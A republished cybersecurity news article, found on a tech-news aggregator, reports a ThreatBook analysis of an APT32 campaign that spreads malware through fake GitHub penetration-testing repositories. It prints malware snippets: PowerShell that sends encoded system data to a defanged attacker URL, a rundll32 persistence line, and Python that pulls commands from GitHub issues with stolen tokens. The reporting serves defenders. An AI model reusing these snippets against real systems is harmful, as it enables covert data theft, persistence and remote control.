Close Menu
RoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech Innovations
  • Home
  • AI
  • Crypto
  • Cybersecurity
  • IT
  • Energy
  • Robotics
  • TechCrunch
  • Technology
What's Hot

Tesla’s robotaxi service to ‘tentatively’ launch in Austin on June 22, Musk says

June 11, 2025

Zuckerberg makes Meta’s biggest bet on AI, $14 billion Scale AI deal

June 11, 2025

Apple unveils watchOS 26 with new design, wrist-flick gesture, and AI Workout Buddy feature

June 11, 2025
Facebook X (Twitter) Instagram
Trending
  • Tesla’s robotaxi service to ‘tentatively’ launch in Austin on June 22, Musk says
  • Zuckerberg makes Meta’s biggest bet on AI, $14 billion Scale AI deal
  • Apple unveils watchOS 26 with new design, wrist-flick gesture, and AI Workout Buddy feature
  • Amazon Kuiper second satellite launch delayed by ULA due to weather
  • Apple AirPods get new features, including studio-quality audio and a camera remote, at WWDC 2025
  • World’s most popular TikTok star Khaby Lame leaves the US after being detained by ICE
  • Google offers buyouts to employees in its Search and ads unit
  • Paragon says it canceled contracts with Italy over government’s refusal to investigate spyware attack on journalist
  • Home
  • About Us
  • Advertise
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
Facebook X (Twitter) Instagram
RoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech InnovationsRoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech Innovations
Wednesday, June 11
  • Home
  • AI
  • Crypto
  • Cybersecurity
  • IT
  • Energy
  • Robotics
  • TechCrunch
  • Technology
RoboNewsWire – Latest Insights on AI, Robotics, Crypto and Tech Innovations
Home » APT32 Hackers Weaponizing GitHub to Attack Cybersecurity Professionals & Enterprises

APT32 Hackers Weaponizing GitHub to Attack Cybersecurity Professionals & Enterprises

GTBy GTApril 11, 2025 Cybersecurity No Comments3 Mins Read
Share
Facebook Twitter LinkedIn Pinterest Email


APT32 Hackers Weaponizing GitHub to Attack Cybersecurity Professionals & Enterprises

The APT32 (OceanLotus) has launched a novel campaign weaponizing GitHub repositories to distribute malware to cybersecurity researchers and enterprises.

This operation represents a strategic shift from the group’s historical focus on Southeast Asian government and corporate targets, instead exploiting the trust inherent in open-source platforms to infiltrate specialized defense communities.

The malware, detected by ThreatBook analysts as Trojan.CobaltGate, employs a multi-stage infection chain beginning with socially engineered GitHub repositories posing as legitimate penetration testing tools.


Google News
Poisoned account (Source – ThreatBook)

These repositories contain obfuscated malicious code within PowerShell scripts and Visual Basic modules designed to bypass static analysis tools.

Attackers use GitHub Issues and Discussions to promote these tools to professionals searching for red-teaming resources, creating an appearance of authenticity through fake contributor activity and star ratings.

ThreatBook researchers identified the campaign’s signature tactic: weaponized repositories automatically clone and execute payloads via GitHub Actions workflows configured with encrypted triggers.

This technique allows threat actors to maintain plausible deniability while enabling remote code execution through compromised GitHub accounts.

The malware exhibits modular architecture with components tailored for credential harvesting, lateral movement, and persistent access to enterprise networks.

Infection Chain Analysis: From Repository Clone to Domain Dominance

The attack sequence begins when victims clone a repository containing a malicious setup.ps1 installer script. This PowerShell script executes a three-stage process:-

# Stage 1: Environment Reconnaissance
$SysData = Get-WmiObject Win32_ComputerSystem | Select-Object -Property Domain,UserName
$encodedData = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($sysData))
Invoke-WebRequest -Uri hxxps://github[.]com/assets/scan.php -Method POST -Body $encodedData

This reconnaissance phase collects domain architecture details and transmits them to attacker-controlled GitHub Pages sites masquerading as analytics platforms.

Chinese expressions (Source – ThreatBook)

The second stage deploys a memory-resident DLL sideloaded through a spoofed Visual Studio Code extension:-

‘ Stage 2: Persistence Mechanism
Set wshShell = CreateObject(“WScript.Shell”)
wshShell.Run “rundll32.exe “”%APPDATA%\vscode-ext\msvcp140.dll””,ExportInitialize”, 0

ThreatBook’s analysis reveals the DLL leverages API hooking to intercept security product communications, specifically targeting endpoint detection and response (EDR) solutions through forged Microsoft telemetry certificates.

The final payload establishes C2 communication via GitHub’s REST API using OAuth tokens stolen from compromised developer accounts:-

# Stage 3: C2 Communication via GitHub
import requests

def fetch_cmd(gh_token, repo):
headers = {“Authorization”: f”token {gh_token}”}
response = requests.get(
f”https://api.github.com/repos/{repo}/issues?labels=update”,
headers=headers
)
return response.json()[0][‘body’].split(‘|’)[1]

This technique allows the malware to blend command traffic with legitimate GitHub API calls, bypassing network monitoring tools that whitelist interactions with the platform.

ThreatBook’s reverse engineering team discovered the operators use elliptic-curve Diffie-Hellman (ECDH) key exchange within issue comments to establish encrypted tunnels.

Cybersecurity firms face new challenges as traditional indicators of compromise (IoCs) like malicious IP addresses become less relevant in platform-abuse attacks.

Researchers urged organizations to implement code repository monitoring solutions that analyze repository contributor histories, detect anomalous API token usage patterns, and profile actions workflow behaviors.

With over 87 million developers using GitHub, the platform’s dual role as collaboration hub and attack vector demands renewed scrutiny from enterprise security teams.

Equip your team with real-time threat analysis With ANY.RUN’s interactive cloud sandbox -> Try 14-day Free Trial



Source link

GT
  • Website

Keep Reading

Google Warns of Cybercriminals Increasingly Attacking US Users to Steal Login Credentials

Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024

Hackers Launching Cyber Attacks Targeting Multiple Schools & Universities in New Mexico

Over 90% of Cybersecurity Leaders Worldwide Encountered Cyberattacks Targeting Cloud Environments

China Reportedly Admits Their Role in Cyber Attacks Against U.S. Infrastructure

10 Best IT Asset Management Tools

Add A Comment
Leave A Reply Cancel Reply

Editors Picks

Zuckerberg makes Meta’s biggest bet on AI, $14 billion Scale AI deal

June 11, 2025

Amazon Kuiper second satellite launch delayed by ULA due to weather

June 11, 2025

Google offers buyouts to employees in its Search and ads unit

June 10, 2025

Anduril’s Palmer Luckey says the company will ‘definitely’ go public

June 10, 2025
Latest Posts

Google Warns of Cybercriminals Increasingly Attacking US Users to Steal Login Credentials

June 9, 2025

Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024

May 15, 2025

Hackers Launching Cyber Attacks Targeting Multiple Schools & Universities in New Mexico

May 6, 2025

Subscribe to News

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

Welcome to RoboNewsWire, your trusted source for cutting-edge news and insights in the world of technology. We are dedicated to providing timely and accurate information on the most important trends shaping the future across multiple sectors. Our mission is to keep you informed and ahead of the curve with deep dives, expert analysis, and the latest updates in key industries that are transforming the world.

Subscribe to Updates

Subscribe to our newsletter and never miss our latest news

Subscribe my Newsletter for New Posts & tips Let's stay updated!

Facebook X (Twitter) Instagram
  • Home
  • About Us
  • Advertise
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
© 2025 Robonewswire. Designed by robonewswire.

Type above and press Enter to search. Press Esc to cancel.

STEAM Education

At FutureBots, we believe the future belongs to creators, thinkers, and problem-solvers. That’s why we’ve made it our mission to provide high-quality STEM products designed to inspire curiosity, spark innovation, and empower learners of all ages to shape the world through robotics and technology.